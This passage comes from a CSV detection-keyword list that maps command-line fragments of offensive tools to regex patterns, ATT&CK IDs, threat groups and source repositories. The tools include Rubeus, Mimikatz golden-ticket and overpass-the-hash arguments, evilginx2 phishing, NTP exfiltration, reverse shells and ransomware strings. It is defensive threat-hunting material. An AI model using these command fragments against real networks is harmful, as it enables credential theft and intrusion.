TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","87","17","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /NAME:* /KILL*",".{0,1000}\s\/NAME\:.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "* /nofullpacsig *",".{0,1000}\s\/nofullpacsig\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /outfile:* /spn:*",".{0,1000}\s\/outfile\:.{0,1000}\s\/spn\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /outfile:* /spns:*",".{0,1000}\s\/outfile\:.{0,1000}\s\/spns\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /PID:* /DRIVER:*",".{0,1000}\s\/PID\:.{0,1000}\s\/DRIVER\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "* /PID:* /KILL*",".{0,1000}\s\/PID\:.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "* /potato.local*",".{0,1000}\s\/potato\.local.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "* /ptt /binary:*.kirbi*",".{0,1000}\s\/ptt\s\/binary\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /pwdsetafter:*",".{0,1000}\s\/pwdsetafter\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /pwdsetbefore:*",".{0,1000}\s\/pwdsetbefore\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /rc4opsec *",".{0,1000}\s\/rc4opsec\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /s4uproxytarget*",".{0,1000}\s\/s4uproxytarget.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /s4utransitedservices*",".{0,1000}\s\/s4utransitedservices.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /service:krbtgt *",".{0,1000}\s\/service\:krbtgt\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /setntlm * /user:* /newhash:*",".{0,1000}\s\/setntlm\s.{0,1000}\s\/user\:.{0,1000}\s\/newhash\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /setntlm * /user:* /newpwd:*",".{0,1000}\s\/setntlm\s.{0,1000}\s\/user\:.{0,1000}\s\/newpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /simple * /spn*",".{0,1000}\s\/simple\s.{0,1000}\s\/spn.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /taskname:Cleanup *",".{0,1000}\s\/taskname\:Cleanup\s.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "* /ticket *.kirbi*",".{0,1000}\s\/ticket\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /ticket:* /autoenterprise *",".{0,1000}\s\/ticket\:.{0,1000}\s\/autoenterprise\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /ticket:* /service:* /targetdomain:* /targetdc:*",".{0,1000}\s\/ticket\:.{0,1000}\s\/service\:.{0,1000}\s\/targetdomain\:.{0,1000}\s\/targetdc\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "* /ticket:*.kirbi*",".{0,1000}\s\/ticket\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /user:* /domain:* /aes256:* /run:powershell.exe*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/aes256\:.{0,1000}\s\/run\:powershell\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /domain:* /ntlm:* /run:powershell.exe*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/ntlm\:.{0,1000}\s\/run\:powershell\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /domain:* /sid:S-1-5-21-* /krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/sid\:S\-1\-5\-21\-.{0,1000}\s\/krbtgt\:.{0,1000}\s\/id\:.{0,1000}\s\/groups\:.{0,1000}\s\/startoffset\:0\s\/endin\:600\s\/renewmax\:10080\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /password:* /enctype:* /opsec /ptt*",".{0,1000}\s\/user\:.{0,1000}\s\/password\:.{0,1000}\s\/enctype\:.{0,1000}\s\/opsec\s\/ptt.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "* /usetgtdeleg *",".{0,1000}\s\/usetgtdeleg\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* :Failed to make full encrypt*",".{0,1000}\s\:Failed\sto\smake\sfull\sencrypt.{0,1000}","offensive_tool_keyword","Akira","Akira ransomware Windows payload","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "* [+] SUCCESS: AMSI Bypassed!*",".{0,1000}\s\[\+\]\sSUCCESS\:\sAMSI\sBypassed!.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "* \Temp\blah.exe*",".{0,1000}\s\\Temp\\blah\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*- {phish_sub: *",".{0,1000}\-\s\{phish_sub\:\s.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","10","5","449","214","2023-12-12T08:00:52Z","2020-05-13T05:58:43Z" "* | ./send -d *:123 -tM 0 -tm 0*",".{0,1000}\s\|\s\.\/send\s\-d\s.{0,1000}\:123\s\-tM\s0\s\-tm\s0.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "* | Find-AmsiSignatures*",".{0,1000}\s\|\sFind\-AmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* | NTLMParse*",".{0,1000}\s\|\sNTLMParse.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "* | Test-ContainsAmsiSignatures*",".{0,1000}\s\|\sTest\-ContainsAmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* \n\n*",".{0,1000}\s\\\n\\n.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "* = ""KRBRELAYUP""*",".{0,1000}\s\=\s\""KRBRELAYUP\"".{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* = [H,O,A,X,S,H,E,L,L]*",".{0,1000}\s\=\s\[H,O,A,X,S,H,E,L,L\].{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "* > \\127.0.0.1\ADMIN$\__* 2>&1",".{0,1000}\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* > Wi-Fi-PASS*",".{0,1000}\s\>\sWi\-Fi\-PASS.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "* 0.0.0.0:8080 --threads*",".{0,1000}\s0\.0\.0\.0\:8080\s\-\-threads.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "* 1$a$$.exe*",".{0,1000}\s1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "* 